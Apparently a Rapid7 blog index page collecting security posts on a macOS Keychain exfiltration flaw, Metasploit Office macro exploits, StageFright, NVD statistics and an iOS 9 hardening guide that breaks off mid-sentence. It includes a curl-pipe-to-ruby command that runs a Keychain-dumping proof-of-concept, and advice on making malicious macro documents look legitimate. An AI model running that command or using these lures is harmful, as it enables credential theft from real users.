Rapid7 Blog


macOS Keychain Security : What You Need To Know

If you follow the infosec twitterverse or have been keeping an eye on macOS news sites, you’ve likely seen a tweet (with accompanying video) from Patrick Wardle (@patrickwardle) that purports to demonstrate dumping and exfiltration of something called the “keychain” without an associated privilege…

If you follow the infosec twitterverse or have been keeping an eye on macOS news sites, you’ve likely seen a tweet (with accompanying video) from Patrick Wardle (@patrickwardle) that purports to demonstrate dumping and exfiltration of something called the “keychain” without an associated privilege escalation prompt. Patrick also has a more in-depth Q&A blog post about the vulnerability. Let’s pull back a bit to provide sufficient background on why you should be concerned. What is the macOS Keychain? Without going into fine-grained detail, the macOS Keychain is a secure password management system developed by Apple. It’s been around a while (back when capital letters ruled the day in “Mac OS”) and can hold virtually anything. It’s used to store website passwords, network share credentials, passphrases for wireless networks, and encrypted disk images; you can even use it to store notes securely. A more “TL;DR” version of that is “The macOS Keychain likely has the passwords to all your email, social media, banking and other websites—as well as for local network shares and your WiFi.” Most users access Keychain data through applications, but you can use the Keychain Access GUI utility to add, change, or delete entries. Here’s a sample dialog containing credentials for a fake application called (unimaginatively enough) “forexample”: The password is not displayed by default. You need tick the “Show password:” box and a prompt will appear: Enter your system password and you’ll see the password: That’s a central part of the Keychain — you provide authority for accessing Keychain elements, even to the application that maintains the secrets for you. Apple has also provided command-line access to work with the keychain via the security command. Here’s what the listing looks like for this example: $ security find-generic-password -s forexample keychain: "/Users/me/Library/Keychains/login.keychain-db" version: 512 class: "genp" attributes: 0x00000007 <blob>="forexample" 0x00000008 <blob>=<NULL> "acct"<blob>="superseekrit" "cdat"<timedate>=0x32303137303932363230313035305A00 "20170926201050Z\000" "crtr"<uint32>=<NULL> "cusi"<sint32>=<NULL> "desc"<blob>=<NULL> "gena"<blob>=<NULL> "icmt"<blob>=<NULL> "invi"<sint32>=<NULL> "mdat"<timedate>=0x32303137303932363230313035305A00 "20170926201050Z\000" "nega"<sint32>=<NULL> "prot"<blob>=<NULL> "scrp"<sint32>=<NULL> "svce"<blob>="forexample" "type"<uint32>=<NULL> Again, the secret data is not visible. As you may have surmised, Apple also provides programmatic access to the Keychain. iOS, tvOS (etc) all use a similar keychain for storing secrets. Before we jump into the news from September 25th, 2017, let’s fire up Apple’s Time Machine and go back about four years… A (Very) Brief History of Keyjacking Rapid7’s own Erran Carey put together a proof-of-concept for “keyjacking” your Keychain a little over four years ago. If you run: curl -L https://raw.github.com/erran/keyjacker/master/keyjacker.rb | ruby You’ll get prompted to unlock the keychain: which will enable the Ruby script to decrypt all the secrets. There’s another related, older vulnerability that involved using a bit more AppleScript to trick the system into allowing unfettered access to Keychain data (that vulnerability no longer exists). So, What’s Different Now? Patrick’s video shows him running an unsigned application that was downloaded from a remote source. The usual macOS prompts come up to warn you that running said apps is a bad idea and when you enable execution a dialog come up with a button. The user in the video (presumably Patrick) presses said button and some time passes, then a file with a full, cleartext export of the entire Keychain is scrolled through. As indicated, many bad things had to happen before the secrets were revealed: the Security System Preferences had to be modified to allow you to run unsigned third-party apps on your system you had to download a program from some site or load/run it from USB (et al) drive you had to say “OK” one more time to Apple’s warning that what you are about to do is a bad idea Sure, registered/signed apps could perform the same malicious function, but that’s less likely since Apple can tie the signed app to the developer (or developer’s system) that created it. What Can I Do? It looks like this vulnerability has been around for a while. macOS Sierra and the just-released High Sierra are both vulnerable to this attack; El Capitan is also reported to be vulnerable. Since you’re likely running El Capitan or Sierra, upgrading to High Sierra isn’t going to put you further at risk. In fact, High Sierra includes security patches and additional security features that make it worth the upgrade. Bottom line: don’t let this vulnerability alone prevent you from upgrading to High Sierra if you’re on El Capitan or Sierra. However, you might want to consider a completely fresh install versus an upgrade. Why? Read on! macOS “power users” will not like the following advice, but you should consider performing a fresh install of High Sierra and starting from a completely fresh system, then migrating signed applications and data over. It’s the next bit that really hurts, though. Don’t install any unsigned third-party apps or any apps via MacPorts or Homebrew until Apple patches the vulnerability. Why? Well, there’s a chance Patrick is not the only one who found this vulnerability, and attackers may try to work up their own exploits before Apple has a chance to release a fix. In fact, they may already have (which is one reason we suggested not just doing an upgrade). And, Apple is working on a fix — Patrick responsibly informed them — but there was no time to bake it in beforethis week’s official release. Using any unsigned third-party code could put your secrets at risk. You should also be wary of running signed code that you download outside the Mac App Store. Apple’s gatekeeping is not perfect, but it’s better than the total absence of gatekeeping that comes with downloads from uncontrolled websites. Rapid7 researchers will be monitoring for other proof-of-concept (PoC) code that exploits this vulnerability (Patrick did not release his PoC code into the wild) and will be waiting and watching for Apple’s first macOS patch release — they released 10.13.1 betas to developers today — to fix this critical issue. Keep watching the Rapid7 blog for updates! Banner photo by Travis Wise • Used with permission (CC BY 2.0)

Cisco Enable / Privileged Exec Support

In Nexpose version 6.4.28, we are adding support for privileged elevation on Cisco devices through enable command for those that are running SSH version 2.A fully privileged policy scan provides more accurate information on the target's compliance status, and the ability to…

In Nexpose version 6.4.28, we are adding support for privileged elevation on Cisco devices through enable command for those that are running SSH version 2.A fully privileged policy scan provides more accurate information on the target's compliance status, and the ability to do so through enable password, while keeping the actual user privilege low, adds an additional layer of security for your devices. This allows our users to run fully privileged policy scans on Cisco IOS without having to pre-configure the target with a user that has full privilege. Instead, they could enter the enable password in the credential window similar to how sudo elevation is set up.Simply navigate to the credential configuration page for SSH services and select Cisco Enable / privileged exec as your elevation type and enter your enable password as the elevation password, per the screenshot below:

Introducing Interactive Guides

Recently, Rapid7 took a step forward to deliver insight to our customers: our vulnerability management solutions now include the ability to deliver interactive guides. Guides are step-by-step workflows, built to deliver assistance to users at the right time. Guides are concise and may be absorbed…

Recently, Rapid7 took a step forward to deliver insight to our customers: our vulnerability management solutions now include the ability to deliver interactive guides. Guides are step-by-step workflows, built to deliver assistance to users at the right time. Guides are concise and may be absorbed with just a few clicks. They are available anytime on-demand within the user interface, so you can quickly and easily find the information you need, as you need it, where you will be applying it.Here's an example:How Guides WorkInteractive guides are powered by Pendo.io. As you navigate through the user interface, relevant guides are made available based on the area of the application in use. Pendo serves Rapid7 authored content directly to the user. The user's workstation must be connected to the internet to make use of these new capabilities. We understand this limits access for some of Rapid7's customers, but for most individuals, internet access has become as important as the keyboard or a monitor.To be clear, to receive guides, the user's workstation requires internet access. The machine hosting the Security Console does not require access to the internet.How are guides delivered in context?In order to determine which guides are relevant to a user in the moment, very specific information is transmitted to Pendo from the user's browser:The URL navigated toCSS element the user has clicked onA globally unique, random identifier for the userWith this information, Rapid7 is able to deliver very specific guidance to users when they need it, for improved experiences within the product. All data collected is anonymized, and all communications between the user's workstation and Pendo.io are encrypted with SSL/TLS. Is my Nexpose data transmitted?No data that is collected by Rapid7 Nexpose about your organization's assets or vulnerabilities is transmitted to Pendo or Rapid7:No personally identifiable information, such as email addresses, names or User IDs is transmitted.No vulnerability data is transmitted.No asset data is transmitted, inclusive of software, attributes, IP addresses, and other metadata.No information collected by Scan Engines or Agents is transmitted.To learn more on how Rapid7 and Pendo.io protect your information, please visit: http://rapid7.com/trust and http://www.pendo.io/support/trust/I don't see any guides. When will they be available?We're busy building guides right now. You can expect to see new guides in the coming weeks.What if I cannot participate, or do not want to participate?If your users have no access to the internet, then you won't be able to receive guides. No data will be transmitted and no guides will be delivered.If you do not wish to receive guides, you can easily disable the capability on the Security Console:Login to the machine hosting the Security Console as an administratorLocate and edit nsc.xml. The file is located in the “deploy/nsc/conf/nsc.xml” directory. For example “/opt/rapid7/deploy/nsc/conf/nsc.xml” in some Linux distributions. Make a copy of the file in case you need to revert the configuration.Edit or add the following element <Analytics enabled=”false” />. This element should be a direct child of <NexposeSecurityConsole />.This is a snippet of the nsc.xml file used to illustrate the format of the element. Your nsc.xml will differ.Changes will take effect during the next Console restart.Making inadvertent changes to the nsc.xml file can cause issues in your Security Console. Please contact Rapid7 Support for guidance or assistance.

Attacking Microsoft Office - OpenOffice with Metasploit Macro Exploits

It is fair to say that Microsoft Office and OpenOffice are some of the most popular applications in the world. We use them for writing papers, making slides for presentations, analyzing sales or financial data, and more. This software is so important to businesses that,…

It is fair to say that Microsoft Office and OpenOffice are some of the most popular applications in the world. We use them for writing papers, making slides for presentations, analyzing sales or financial data, and more. This software is so important to businesses that, even in developing countries, workers that are proficient in an Office suite can make a decent living based on this skill alone. Unfortunately, high popularity for software also means more high-value targets in the eyes of an attacker, and malware-infested Office macros are like an irritating rash that doesn't go away for IT professionals. A macro is a feature that allows users to create automated processes inside of a document used by software like Microsoft Word, Excel, or PowerPoint. This is used to enhance user experience, increase productivity, or automate otherwise manual tasks. But, in other words, it executes code. What kind of code? Well, pretty much whatever you want, even a Meterpreter session! Macro attacks are nothing new or unusual. A typical attack usually involves embedding malicious macro code in an Office document, sending it to the victim, and asking him or her very nicely to enable that code. The saddest part isn't how lame the attack is, since you are basically begging the victim to run your malware. It's that people have been falling for this trick for decades! The impact of such attacks should not be underestimated. In fact, malicious macros are often used in ransomware, and other high-profile breaches. For example, the Cerber Ransomware was a macro attack against Office 365 that put millions of users at risk. Since Office 365 is extremely popular in businesses, we expect it to be one of malicious macros' favorite audiences for quite some time. Yup, I think people call that social-engineering, and apparently it always works. I figured: "ok, why not, a shell is a shell. Let me write some exploits for these"... and that's how Metasploit's macro exploits were born: The Microsoft Office Macro Exploit This Microsoft Office macro exploit is specifically written for the Word document format. It has been tested against these environments: Microsoft Office 2010 for Windows Microsoft Office 2013 for Windows Microsoft Office 2016 for Windows Microsoft Office Word for Mac OS X 2011 The following demonstrates how to create a macro exploit for Microsoft Office for OS X, setting up a handler, as well as obtaining a session: If you actually have a valid certificate to sign the malicious macro, you can actually apply that by using Microsoft Office to sign it. Having a valid cert will not have the "Enable Content" prompt, Microsoft Office will just execute your code by default. However, this is obviously only ideal for internal use. Good certificates are expensive. The OpenOffice Macro Exploit The Apache OpenOffice macro exploit is specifically written for OpenOffice Writer (odt). It has been tested against these environments: Windows with Powershell support (which should be the case since Windows 7) Ubuntu Linux (which ships LibreOffice by default) OS X Unlike Microsoft, OpenOffice actually does not want to open any documents with macros, which means in order to attack, the victim has to manually do the following in advance: 1. Choose Tools -> Options -> Security 2. Click the Macro Security button 3. Change the security level to either medium to low. If the security level is set to medium, a prompt is presented to the user to either allow or disallow the macro. If set to low, the macro will run without warning. Now let's talk about how to use the exploit. The design for it is actually different than the Microsoft one: not only will it create the malicious document file, the module will also spawn a web server, and a payload handler. The purpose of the web server is when the victim runs the macro, the malicious code will download the final payload from our web server, and execute it. The following demonstrates how to use the exploit: Exploit Customization Although the Metasploit macro exploits work right out of the box, some cosmetic customizations are probably necessary to make the document look more legit and believable. To do this, you will need a copy of either Microsoft Office or OpenOffice (depending on the type of exploit you're using), and then: Generate the exploit Move the exploit to a platform with Office that can edit the document Open the document with Office, do your editing there. When you're done, simply click save. As long as you're not modifying the macro, it should still work Time to Play! Congratulations, young grasshopper! If you've read this far, and have not fallen asleep, then you are ready to start your journey of sweet Office macro pwnage. But before you leave, if you have never used Metasploit - a cyber weapon forged in the fires of um... Austin, Texas - then you shall download it here. If you already possess such power, then we strongly recommend you run msfupdate. Go now, embrace your destiny of pwnage, and let that glory be yours with Metasploit Office macro exploits.

Pokemon Go, Security, and Obsolescence

Pokemon Go started it. The crusty old house cell phone, which we had years ago ported from a genuine AT&T land line to a T-Mobile account, suddenly caught the attention of my middle son. "Hey Dad, can I use that phone to…

Pokemon Go started it. The crusty old house cell phone, which we had years ago ported from a genuine AT&T land line to a T-Mobile account, suddenly caught the attention of my middle son. "Hey Dad, can I use that phone to catch Pokemon at the park?" "Sure! Have fun, and don't come back until sundown!" A few minutes later, he had hunted down his first Pikachu, which apparently required running around the block in Texas summer heat a few times. Sweat-soaked but proud, he happily presented his prize. I could get used to this! The kids were getting out of the house, exploring the neighborhood, having fun, and I was getting a little peace and quiet. Then one day, Pokemon Go stopped working, stating that it did not support 'rooted' phones. First some back story. Our 'house phone' role is generally filled by the most-working last-gen reject device that is too old to be useful as a daily driver, but too new to throw away. In this case, it was a Google Nexus 4. I have always preferred the Google phones over other third parties for a number of reasons: They're cheap if you get the last generation (and sometimes the current). They usually lead the pack when it comes to software updates and hackability. However, given the industry's appetite for quick turnarounds and obsolescence cycles, (and in spite of Google's generally good support) this phone is end-of-life, and has not received an official firmware update in over a year. In fact, this phone is the amalgamation of two Nexus 4's, combined into a frankenstein assemblage of the most-working screen, battery, and charging ports of the original pair. Since it has been a year and a half since Google released a firmware for this phone, I had it running the next-best thing: Cyanogenmod 13, which backported Android 6 to this hardware. Now, this junker phone is up-to-date as much as the Android Open Source Project (AOSP) allows. But, there was now a show-stopper: you now can't run Pokemon Go on rooted phones using Cyanogenmod. Technically, there is a new set of hacks, but this is a cat-and-mouse game, but there comes a time in your life when you just want things to work. And they were already hooked. Why did Niantic decide to impose this restriction after several months of unrestricted access? It comes down to cheaters. People were rooting their phones specifically to fake GPS coordinates to get rare Pokemon, grow eggs, etc. Since having root access is also required to install non-stock firmware, in this guilty-until-proven-innocent model, we basically get to choose between two possibilities: get up-to-date software but sacrifice the ability to run some applications, or run increasingly out-of-date 'official' software, for the sake of satisfying a DRM or anti-cheating scheme. In the end, I decided that the stock firmware still allowed upgrading a lot of the key components via the Google's Play Store, the real core around which an increasing amount of the software in the Android ecosystem relies. Sure, I'm not getting the latest advances in encrypted filesystems, kernel hardening, or process isolation in the latest versions of Android, but it's a tradeoff. Maybe the phone will have died completely by the time the next exploitable bug in libstagefright rears its head. But, maybe it already has. It took over a year for enough of the moving parts for a reliable exploit for CVE-2015-3864, one of the 'StageFright' series of vulnerabilities, to come together within Metasploit. The exploit needed new payloads, new techniques, and a number of independent research projects to become useful outside of the proof-of-concept realm. In the end, it works very well, even better than the Metaphor exploit from earlier this year, and can be easily targeted to any vulnerable Nexus phone. Ironically, the very openness of the Google Nexus ecosystem made porting the exploit to those firmware builds particularly easy. In contrast, Samsung firmware, which contains many proprietary additions to the base Android system, and is not open-source, is harder to target simply because it is harder to examine. In spite of this, it was still possible to target Samsung phones as well. Effectively, with enough effort, any firmware is exploitable. It is just a question of time. When you think of exploits in the StageFright family, think of the vector: someone sends a special text message and take over a phone without anyone even reading it. You get an email, and without opening it, code is already executed on your device. It's a simple concept, but the fix is not nearly as straightforward. Automatic parsing of metadata in media files is a commonly-researched and targeted vulnerability in many different products. Adobe flash has had nasty vulnerabilities in its MP3 metadata parsing code earlier this year. Apple iOS has been vulnerable a number of times to similar attacks. Just last month, similar vulnerabilities in Android's libutils library were found, which could be attacked in a similar way. The exploit that we included in Metasploit for CVE-2015-3864 only targets one vector (web browser) and one file type (MP4 video files). However, there are many other vectors and file types that could also be exploited in the same family, that were discovered around the same time period as CVE-2015-3864. Not only that, but more vectors and file types have been found since the original round of StageFright branded vulnerabilities were hot in the news, and quietly patched. Of course, none of these patches have made it into the official firmware for my Nexus 4. I even had to do a double-take in researching this article, since Wikipedia claimed Android 5.1.1 was last updated 2 months ago, while I knew the phone hadn't gotten an over-the-air update in some time. To really know if you're up-to-date, you have to look at the build number, Nexus 4 being on LMY48T while the latest is LMY49M. It's unlikely that the average consumer with a phone running Android '5.1.1' would be able to know difference between a vulnerable or up-to-date build number, much less the average business with a bring-your-own-device policy. The choice between running the software you want, like Pokemon Go, and the quick road to obsolete devices in the Android ecosystem, at best forces users to make a choice between security and functionality. The theoretical exploit chains being patched this year can easily turn into next year's reliable Metasploit module. Maybe it's time to bring back to a land line.

Using the National Vunerability Database to Reveal Vulnerability Trends Over Time

This is a guest post by Ismail Guneydas. Ismail Guneydas is senior technical leader with over ten years of experience in vulnerability management, digital forensics, e-Crime investigations and teaching. Currently he is a senior vulnerability manager at Kimberly-Clark and an adjunct faculty at Texas A&…

This is a guest post by Ismail Guneydas. Ismail Guneydas is senior technical leader with over ten years of experience in vulnerability management, digital forensics, e-Crime investigations and teaching. Currently he is a senior vulnerability manager at Kimberly-Clark and an adjunct faculty at Texas A&M. He has M.S.  in computer science and MBA degrees. 2015 is in the past, so now is as good a time as any to get some numbers together from the year that was and analyze them.  For this blog post, we're going to use the numbers from the National Vulnerability Database and take a look at what trends these numbers reveal. Why the National Vulnerability Database (NVD)?  To paraphrase Wikipedia for a moment, it's a repository of vulnerability management data, assembled by the U.S. Government, represented using the Security Content Automation Protocol (SCAP). Most relevant to our exercise here, the NVD includes databases of security-related software flaws, misconfigurations, product names, impact metrics—amongst other data fields. By pouring through the NVD data from the last 5 years, we're looking to answer following questions: What are the vulnerability trends of the last 5 years, and do vulnerability numbers indicate anything specific? What are the severities of vulnerabilities? Do we have more critical vulnerabilities or less? What vendors create most vulnerable products? What products are most vulnerable? Which OS? Windows OSX, a Linux distro? Which mobile OS? IOS, Android, Windows? Which web browser? Safari, Internet Explorer, Firefox? Vulnerabilities Per Year That is correct! Believe it or not, there was a 20% drop in the number of vulnerabilities compared to the number of vulnerabilities in 2014. However, if you look at the overall trending growth in the last 5 years, the 2015 number seems to be consistent with the overall growth rate. The abnormality here was the 53% increase in 2014. If we compare 2015's numbers with 2013, then we see  24% increase. All in all though, this doesn't mean we didn't have an especially bad year as we did in 2014 (the trend shows us we will have more vulnerabilities in the next few years as well). That's because when we look closely at the critical vulnerabilities, we see something interesting. There were more critical vulnerabilities in 2015 then 2014. In 2014 we had more vulnerabilities with CVSS 4, 5, and 6; however, 2015 had more vulnerabilities with CVSS 7, 8, 9 and 10! As you see above there are 3376 critical vulnerabilities in 2015 where as there were only 2887 critical vulnerabilities in 2014. (That is a 17% increase.) In other words, the proportion of critical vulnerabilities is increasing overall. That means we need to pay close attention to our vulnerability management programs and make sure they are effective—fewer false positives and negatives—up-to-date with recent vulnerabilities, and faster with shorter scan times. Severity of Vulnerabilities This chart shows weight distribution of 2015 vulnerabilities, based on CVSS score. As (hopefully) most of you know, 10 is the highest/most critical level, whereas 1 is the least critical level. There are many vulnerabilities with CVSS 9 and 10. Let's check following graph that gives more clear picture: This means 36% of the vulnerabilities were critical (CVSS >=7). The average CVSS is 6.8 so that is at the boundary to be critical. The severity of vulns is increasing, but this isn't to say it's all bad. In fact, it really exposes a crucial point: That you have to be deploying a vulnerability management program that separates the weak from the chaff. Effective vulnerability management program will help you to find and then remediate vulnerabilities in your environment. Vulnerability Numbers Per Vendor Let's analyze national vulnerability database numbers by checking vendors' vulnerabilities. The shifting tides in vulnerabilities doesn't stop for any company, including Apple. The fact is there are always vulnerabilities, the key has to be detecting these before they are exploited. Apple had the most number of vulnerabilities in 2015.  Of course with many iOS and OSX vulnerabilities out there in general, it's no surprise this number went up. Here is the full list: Apple jumped from being number 5th in 2014.  Microsoft was number 3rd and Cisco was number 4th. Surprisingly Oracle (owner of Java) did well this year and took 4th place (they were number 2 last year). Congratulations (?) to Canonical and Novel, as they were not in top 10 list last year (they were 13rd and 15th).  So in terms of prioritization, with Apple making a big jump last year, if you have a lot of iOS in your environment, it's definitely time to  make sure you've prioritized those assets accordingly. Here's a comparison chart that shows number of vulnerabilities per vendor for 2014 and 2015. Vulnerabilities Per OS In 2015, according to the NVD, OSX had the most vulnerabilities, followed by Windows 2012 and Ubuntu Linux. Here most vulnerable Linux distro is Ubuntu. Opensuse is the runner up and then Debian Linux. Interestingly Windows 7, the most popular desktop application based on its usage, is reported to be less vulnerable then Ubuntu. (That may surprise a few people!) Vulnerabilities Per Mobile OS IPhone OS has the highest number of vulnerabilities published in 2015. Windows and Android came after iPhone. 2014 was no different. iPhone OS had the highest number of vulnerabilities and Windows Rt and Android followed it. Vulnerabilities Per Application Vulnerabilities Per Browser IE had highest number of vulnerabilities in 2015. In 2014, the order of product with the highest number of vulnerabilities were exactly same. (IE, Chrome, Firefox, Safari.) Summary Given the trends over the past few years reported via the NVD, we should expect more vulnerabilities to be published with higher CVSS score this year. Moreover, I predict that mobile OS will be hot area for security — as more mobile security professionals find and report mobile OS vulnerabilities, we'll see an increase in Mobile OS vulnerabilities as well. It's all about priorities. We only have so many hours in the day and resources available to us to remediate what we can. But if you take intel from something like the NVD and layer that over the visibility you have into your own environment, you can use this information to help build a good to-do list built by priorities, and not fear.

Reduced Annoyances and Increased Security on iOS 9: A Win Win!

Introduction Early this year, I posted an article on iOS Hardening that used animated GIFs to explain most of the recommended settings. Since then, iOS 9 was released, bringing along many new features, including better support for Two-Factor Authentication, as iMessage and FaceTime now work…

Introduction Early this year, I posted an article on iOS Hardening that used animated GIFs to explain most of the recommended settings. Since then, iOS 9 was released, bringing along many new features, including better support for Two-Factor Authentication, as iMessage and FaceTime now work without the need for app-specific passwords, and as your trusted devices now automatically get trusted when you authenticate using them As many people will be getting new iOS devices this holiday season, I decided to write about some simple, but very effective settings you can configure on iOS, to improve security significantly and reduce annoyances. This guide is meant for personal devices, but most of the recommendations here should apply to enterprise as well. However, some of the settings require making a device "supervised", which is typically not done on devices owned by employees. First, let's described some annoyances, and what the features to resolve them and improve security are. Then, we'll go over how to deploy these settings to iOS devices. Some of these will be even more valuable to those of you that travel often, and end up having to use Wi-Fi, as well as leaving iOS devices in less-than-ideal locations without keeping physical control over them. Warning: Two of these settings will require you to set your device to be a supervised device. These are is the settings to prevent a device from being paired to iTunes, as well as from trusting new enterprise application certificates. This means that you should only perform this change on devices that you own, but it also means that you will need to wipe your device in the process, and that restoring of a prior-to-supervision backup to a supervised device actually undoes the process. This is why I am posting this around the holidays, as it is an ideal guide for new devices, when you can benefit from a clean setup. Ex: Restoring from iTunes or iCloud after supervising a device will simply restore it to its prior state, without the configuration profile. No matter what, make sure you have good backups, but understand that you may lose data. The settings that are not marked as "supervised only" can easily be used on existing devices. Annoyances and Security Issues Problem 1 - Ability to Trust Other Computers Your iOS device prompts to trust each computer you connect it to. Then, if you mistakenly trust another computer, you'll need to delete all your network settings to delete that trust relationship. While it's great that it doesn't trust computers by default, wouldn't it be nicer if it just did not ask? Why would anyone want to trust another computer from their iOS device? Benefits No more annoying prompts, no chance of trusting a computer by mistake, and even if your iPad was stolen unlocked from your hands, the thief would not be able to back it up to iTunes for further analysis. For an excellent explanation of why this setting is valuable, see this article by iOS Forensics expert. This article, as well as some other research he has performed is a big reason why I've decided that this setting made sense for me, and why I believe more people should be using it. Note that the screenshots in his detailed explanation, at the moment, are not up to date for iOS 9 and the latest Apple Configurator. Warnings As mentioned above, this setting will require your device to be supervised, which means it will need to be wiped. Additionally, you will not be able to use iTunes, and even importing photos on other computers will be impossible. This, in itself, is a great feature, but consider how you use your device. If you use iCloud Photos and iCloud Backups, you probably very rarely use your device through USB for anything but charging, and if you use iTunes Backups, it will be possible to back your device up via the Apple Configurator later. Problem 2 - Ability to Allow Untrusted Certificates You're at the airport, or in a hotel. You hop on Wi-Fi, and before you can accept the captive portal's terms, so your VPN session can then be established, you receive a bunch of SSL/TLS warnings about untrusted certificates being used for your email, a page that was already open in Safari, or any other type of encrypted connectivity. If you've ever received so many of those that you accidentally accepted one of them, and realized one of your email accounts tried to authenticate using that certificate and proceeded to rapidly change that account's password while in a state of semi-panic, this setting is absolutely for you. Benefits Your iOS device will now simply refuse to establish a connection when the certificate is untrusted. This will reduce the amount of pop-ups from background processes such as email sync, but will also prevent the accidental acceptance of such a prompt, which could lead to leaked data and credentials. Warnings If you often use your iOS device to connect to services that are protected by self-signed SSL certificates, you will be unable to do so after enabling this feature, unless you then install the appropriate certificate on your device. You can use the Apple Configurator to push any Root CA you need, as well as individual certificates. You will also lose the ability to connect to websites that, for some weird reason, decided to use self-signed certificates, which is not only rare but probably a bad idea to begin with. Problem 3 - Redundant Prompts for Password Management You use a password manager such as 1Password. You never want to be prompted again to use iCloud Keychain, or to save a password for a specific site in Safari (NO, NOT NOW, NOT EVER!!). Benefits While this is not necessarily a security improvement directly, as iCloud Keychain has some interesting security capabilities, it is a security improvement in the sense that it will prevent duplication of databases containing them. To me though, it's more about not being interrupted when logging into a website, or being asked to configure a feature I will never use. Warnings Autofill will be disabled for other fields as well. This is less of a problem if the password manager you use also allows you to manage identities, and other non-password information. Problem 4 - Backup Options are not Enforced You've decided how you want to handle backups on iOS. The options you have are: iCloud Backup. Easy, automated, probably the best way to avoid accidentally losing data, but will backup your data in a way that defeats some security features such as end-to-end encryption on iMessage. If this is a big deal to you, remember that the people you communicate with using iMessage probably use iCloud Backup. iTunes Backups: Less automated, requires using a computer, but allows you to keep your data locally. If using iTunes backups, ensure that encryption is enforced, so that anyone with access to your computer can not simply restore the backup. You will also gain the ability to restore more items from the keychain, when using encrypted backups, meaning you will not have to login to as many apps after restoring. You can't use this if you decide to enable the features to mitigate problem 1. Apple Configurator Backup: Not automated at all, requires you to manually perform a backup. Those backups can be encrypted like iTunes backups, and can be performed from the Configurator host, in case you prevent iTunes pairing as shown in problem 1. Do not backup, rely on apps that sync data to other local systems or cloud services. (pro tip: you always need backups, especially when you thought you didn't. I lost many Crossy Road characters thinking that I didn't need to back up one device so frequently). Benefits Once you've decided what your backup strategy is, it's important to enforce your choice as much as possible to avoid things such as accidental clear text backups on iTunes, or accidental iCloud backups. Problem 5 - Enterprise Certificates are Allowed to be Trusted By default, your iOS device could prompt you to install an application signed by an enterprise. This is typically used to deploy corporate applications, but could also be used to distribute malware, as shown by Palo Alto with YiSpecter recently. With iOS 9, Apple made the process safer, but someone with physical control of your device could definitely perform these steps by hand, and if it is a device used by multiple users, someone could be tricked into trusting an enterprise certificate. Benefits Your device will not accept new enterprise certificates and applications signed with them. Warnings If you actually need to install enterprise apps, you'll want to avoid this setting. This is also a device that will require a supervised device, meaning you will need to wipe it to enable the setting. Personally, I have some iOS devices on which I know I will never install an enterprise app, so I turn this on, and feel smug about how I will not accidentally trust one in the future. Problem 6 - Web Browsing Defaults are Less than Ideal Ad tracking, pop-ups and other types of often distasteful ads making your browsing experience slower, less private and less secure. Benefits We will ensure that iOS and Safari are configured to reject third party cookies, force limited ad blocking as well as block pop-ups. Obviously, this is not a replacement for running a good Content Blocker, but it is a nice baseline to have. Warnings Some websites could break due to those settings, specifically regarding cookie handling. Two options will be provided in the guide, one more secure, one slightly less so but more compatible. Let's do it! Install Apple Configurator 2 From the Mac App Store, install the Apple Configurator 2. Prior versions will not work with iOS 9. Make sure no devices are connected via USB and start the Configurator. Connect via USB After ensuring you have good, working backups (better safe than sorry), if you plan to wipe the device and to make it supervised, sign out of iCloud to disable Activation Lock temporarily. Connect your device to the computer running Apple Configurator 2 over USB. Ensure that you are under the All Devices tab. You will see your device appear. If a Lock icon appears, unlock the device. Prepare the device Select your device by clicking on it in the Apple Configurator, then click Prepare. Supervise If you want to be able to pair-lock this device to just this computer, as well as to restrict enterprise applications, you need to supervise the device. Remember that this will require wiping the device. If this is how you want to proceed, select Supervise Devices, and ensure Allow devices to pair with other computers is not selected. Finish Preparing Finish preparing the device by selecting: Configuration: Manual Server: Do not enroll in MDM (if you are performing those steps on a corporate device, you know what to do) Organization: Create a new organization. The names you put in there will appear in the configuration screens but do not have to be real. Only a name will suffice. Supervision Identity: If prompted, create a supervision identity. If you already had one, this means you already had supervised devices configured from this computer. If not prompted, you are either not supervising the device, or as you didn't have one before, an identity will be created automatically. The identity, in reality, consists of certificates used between the iOS device and Mac to authenticate the USB connection. Make sure those are backed up, since a lost supervision identity could mean having to wipe the device to modify the profile in the future. Setup Assistant: Show All Steps. You can customize this, but for personal purposes, it's not very useful. The Configurator will start preparing the device. If you see such a prompt, remember that clicking Restore will wipe the device. In this case, the test device I am using already had data on it, was managed, etc. Then, the Configurator will download the latest version of iOS, install it, and prepare the device,  which should take from A Long Time to Forever. If your device had Activation Lock left enabled, you might receive this prompt. In this case, activate the device manually, then start over. Done Preparing Once the process is complete, your device should show up under the Supervised or Unsupervised tab, depending on what you chose. It is now ready to be configured. Create a Profile In Apple Configurator, hit File, then New Profile. Name your profile, and see if you want to give it an identifier, description and more. These fields will be displayed only, except for the identifier, which will be used int he future to identify that profile and ask you if you want to overwrite it, if you ever modify it. The Security and Automatically Remove Profile field are interesting. If your device is supervised, it can't be paired to iTunes. You can chose to set the profile to be removable Always (dangerous, especially if you expected to prevent an adversary from being able to perform an iTunes backup!), With Authorization (a passcode that it will prompt you for, which I would recommend not storing on or with the device), or, the most secure option but most restrictive, Never. As for Automatically Remove Profile, for personal usage, I can't think of any reason not to set it to Never. Go to Restrictions and click Configure. For Problem 1, go to Restrictions, Functionality and ensure Allow Pairing with non-Configurator hosts (supervised only) is unchecked. For Problem 2, still in Functionality, ensure that Allow users to accept untrusted TLS certificates is unchecked. For Problem 3, in Functionality, ensure that Allow iCloud Keychain is unchecked, and that under the Apps tab, Enable Autofill is unchecked. For Problem 4, in Functionality, if you use iTunes backups, ensure that Force Encrypted Backups is checked and that Allow iCloud Backup is unchecked. If you want to use iCloud backup, ensure Allow iCloud Backup is checked, but the encryption setting will have no impact. If you want to use Apple Configurator backups, I recommend forcing encrypted backups and disallowing iCloud backup, though the forced encryption setting does not appear to apply to it, disabling iCloud Backup will prevent accidental online backups. For Problem 5, in Functionality, make sure Allow Trusting new enterprise app profile (supervised only) is unchecked. For Problem 6, under the Apps tab, ensure that Block pop-ups is checked, that Accept Cookies is set to From Current Website Only (most secure) or at least From Websites I Visit (more compatible, more secure than the default value). Under the Functionality tab, ensure that _Force Limited Ad Tracking_is checked. While you are creating the profile, feel free to configure additional security settings, such as enforcing better passcodes, or pre-configuring your Wi-Fi network name and password so you don't have to type those 127 random characters on a small device screen. Save the profile, close the profile window. Apply the Profile Back on the main Configurator screen, select the device, then click Add, select Profiles, and browse to your recently saved profile. Add it. The device will be reconfigured automatically, which should take a few seconds. Browse to Settings on your phone, go to General and select Profile. You should now see your profile, and if you drill down, get to a screen describing the configuration changes that apply.  Backing up your device, if you now prevent pairing and do not use iCloud Backup If you've decided to supervise your device, prevent iCloud Backup as well as pairing to iTunes, use the Configurator to back your device up. If you select your device, you should now see all the information about it, such as serial numbers, IMEI, and the fact that pairing is not allowed. Click "Encrypt Local Backup", and 